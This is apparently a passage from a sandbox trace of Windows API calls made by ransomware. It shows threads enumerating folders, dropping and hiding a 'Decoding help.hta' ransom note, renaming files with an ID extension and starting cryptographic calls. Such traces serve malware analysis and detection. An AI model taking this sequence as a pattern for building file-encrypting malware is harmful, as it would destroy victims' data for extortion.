FindNextFileW (in: hFindFile=0x5a5330, lpFindFileData=0x1751fd30 | out: lpFindFileData=0x1751fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812936d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c347960, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c347960, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="WORKFL~2.TAR")) returned 1 [0048.559] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0048.559] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned 81 [0048.559] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" [0048.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\decoding help.hta")) returned 0xffffffff [0048.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0050.386] WriteFile (in: hFile=0x370, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1751fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1751fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.543] CloseHandle (hObject=0x370) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.626] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.Targets") returned -1 [0057.626] lstrlenW (lpString="Workflow.Targets") returned 16 [0057.626] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0057.626] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned 81 [0057.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", lpString2="Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" [0057.626] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" [0057.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0057.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa14 [0061.598] CreateFileMappingA (hFile=0xa14, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x64c [0061.598] CryptAcquireContextA (phProv=0x1751fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 571 os_tid = 0xd30 [0048.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0048.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.577] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.577] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.577] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0048.577] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.577] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.577] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0049.538] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" [0049.538] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned 95 [0049.538] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0049.538] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0049.538] GlobalMemoryStatus (in: lpBuffer=0x12f1fd10 | out: lpBuffer=0x12f1fd10) [0049.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e2ecc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0049.615] CloseHandle (hObject=0x260) returned 1 [0049.615] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.615] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 572 os_tid = 0xd34 [0048.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8750 [0049.866] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.867] FindNextFileW (in: hFindFile=0x5d8750, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.867] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.867] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.867] FindNextFileW (in: hFindFile=0x5d8750, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0049.867] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0049.867] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0049.867] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0050.232] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" [0050.232] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned 96 [0050.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0050.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0050.232] GlobalMemoryStatus (in: lpBuffer=0x1761fd10 | out: lpBuffer=0x1761fd10) [0050.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x251178b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0050.236] CloseHandle (hObject=0x490) returned 1 [0050.236] FindNextFileW (in: hFindFile=0x5d8750, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0050.236] FindClose (in: hFindFile=0x5d8750 | out: hFindFile=0x5d8750) returned 1 Thread: id = 573 os_tid = 0xd38 [0048.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*", lpFindFileData=0x1771fd30 | out: lpFindFileData=0x1771fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8810 [0049.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.287] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x1771fd30 | out: lpFindFileData=0x1771fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.287] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.287] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x1771fd30 | out: lpFindFileData=0x1771fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fae55dc, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x5fae55dc, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x5fc160dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="")) returned 1 [0049.625] lstrcpyW (in: lpString1=0x108f0608, lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0049.625] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 81 [0049.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" [0049.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta")) returned 0xffffffff [0049.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0050.376] WriteFile (in: hFile=0x32c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1771fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1771fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.669] CloseHandle (hObject=0x32c) returned 1 [0052.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.718] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.Targets") returned -1 [0056.718] lstrlenW (lpString="Workflow.Targets") returned 16 [0056.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 81 [0056.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" [0056.719] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" [0056.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0056.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.723] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x1771fd30 | out: lpFindFileData=0x1771fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eae0db9, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x2eae0db9, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x5fe776dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 1 [0056.723] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 81 [0056.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" [0056.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta")) returned 0x1 [0056.723] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.VisualBasic.Targets") returned -1 [0056.723] lstrlenW (lpString="Workflow.VisualBasic.Targets") returned 28 [0056.723] lstrcmpiW (lpString1="[ID]", lpString2="gets") returned -1 [0056.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 81 [0056.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Workflow.VisualBasic.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" [0056.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" [0056.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0056.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 